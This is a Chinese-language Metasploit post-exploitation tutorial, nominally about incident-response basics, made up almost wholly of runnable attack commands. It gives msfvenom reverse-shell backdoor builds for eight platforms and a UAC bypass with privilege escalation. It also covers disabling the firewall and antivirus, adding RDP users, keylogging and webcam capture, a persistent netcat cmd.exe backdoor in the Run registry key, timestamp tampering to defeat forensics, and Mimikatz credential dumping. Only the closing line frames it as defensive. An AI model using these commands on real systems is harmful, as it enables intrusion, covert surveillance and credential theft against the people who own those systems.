后渗透分析应急响应基础入侵篇

一、Metasploit基础后门生成

1. 常见后门类型及生成命令

Windows后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=44444 -f exe > test.exe

Linux后门

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f elf > text

Java后门

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f raw > text.jar

PHP后门

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f raw > text.php

JSP后门

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f raw > text.jsp

ASP后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f asp > shell.asp

ASPX后门

msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=7788 -f aspx > back.aspx

Android后门

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f raw > text.apk

2. msfvenom参数详解

• -p, --payload <payload>: 指定需要使用的payload(攻击荷载)
• -l, --list [module_type]: 列出指定模块的所有可用资源
• -f, --format <format>: 指定输出格式
• -e, --encoder [encoder]: 指定需要使用的编码器
• -a, --arch <architecture>: 指定payload的目标架构
• --platform <platform>: 指定payload的目标平台
• -b, --bad-chars <list>: 设定规避字符集
• -i, --iterations <count>: 指定payload的编码次数
• -x, --template <path>: 指定一个自定义的可执行文件作为模板
• -o, --out <path>: 保存payload

二、后门利用与权限提升

1. 监听设置

在MSF中设置监听：

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.133.130
set LPORT 4444
exploit

2. 绕过UAC

use exploit/windows/local/ask
set session 1
exploit

3. 权限提升

getuid
getsystem

三、系统控制与信息收集

1. 防火墙操作

关闭防火墙：

netsh firewall set opmode disable

添加端口例外：

netsh firewall add portopening TCP 666 "VMvare" ENABLE ALL

2. 杀毒软件处理

尝试关闭杀毒软件：

run killav

3. 远程桌面控制

开启远程桌面：

run post/windows/manage/enable_rdp
或
run getgui -e

添加用户：

run getgui -u admin -p admin

四、信息收集与监控

1. 屏幕截图

screenshot

2. 键盘/鼠标控制

uictl [enable/disable] [keyboard/mouse/all]
uictl disable mouse  # 禁用鼠标
uictl disable keyboard  # 禁用键盘

3. 键盘记录

keyscan_start  # 开启键盘记录
keyscan_dump   # 显示捕捉到的键盘记录
keyscan_stop   # 停止键盘记录

4. 摄像头操作

webcam_list    # 查看摄像头
webcam_snap    # 通过摄像头拍照
webcam_stream  # 通过摄像头开启视频

五、持久化与网络操作

1. 上传工具

上传NC工具：

upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32

2. 注册表操作

枚举注册表启动项：

reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

设置注册表启动项：

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d "C:\windows\system32\nc.exe -Ldp 666 -e cmd.exe"

查询注册表值：

reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc

3. 网络嗅探

抓包并保存：

use auxiliary/sniffer/psnuffle
set pcapfile 1.cap
run

六、反取证与凭证获取

1. 修改文件时间戳

timestomp -v secist.txt  # 查看MACE时间
timestomp -f c:\\AVScanner.ini secist.txt  # 复制时间戳

2. Mimikatz使用

加载Mimikatz：

load mimikatz

获取凭证信息：

msv          # 获取hash值
ssp          # 获取明文信息
wdigest      # 获取系统账户信息
mimikatz_command -f a::     # 显示正确模块
mimikatz_command -f hash::  # 获取目标hash

七、总结

本文详细介绍了通过Metasploit进行后渗透分析的基础操作，包括：

1. 各种平台后门的生成方法
2. 权限提升与UAC绕过技术
3. 系统控制与信息收集技术
4. 持久化与网络操作技巧
5. 反取证与凭证获取方法

这些技术对于安全人员了解攻击者行为模式、进行应急响应和防御策略制定具有重要意义。